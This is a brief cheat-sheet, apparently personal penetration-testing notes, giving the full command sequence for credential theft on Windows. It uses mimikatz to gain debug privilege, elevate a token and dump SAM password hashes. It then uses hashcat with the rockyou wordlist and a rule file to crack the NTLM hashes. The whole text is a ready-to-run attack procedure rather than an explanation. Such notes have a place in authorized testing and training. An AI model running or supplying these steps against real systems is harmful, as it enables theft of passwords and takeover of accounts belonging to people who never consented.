Cracking NTLM hashes
.\mimikatz.exe
## make sure you have enough privileges
privilege::debug
## make sure the tickets can be impersonated
token::elevate
## dump lsa password hashes
lsadump::sam
##find the Id of ntlm in hashcat
hashcat --help | grep -i "ntlm"
## crack the hash which was put into a .hashes file
hashcat -m 1000 nelly.hash /usr/share/wordlists/rockyou.txt.gz -r /usr/share/hashcat/rules/best66.rule --forceLast updated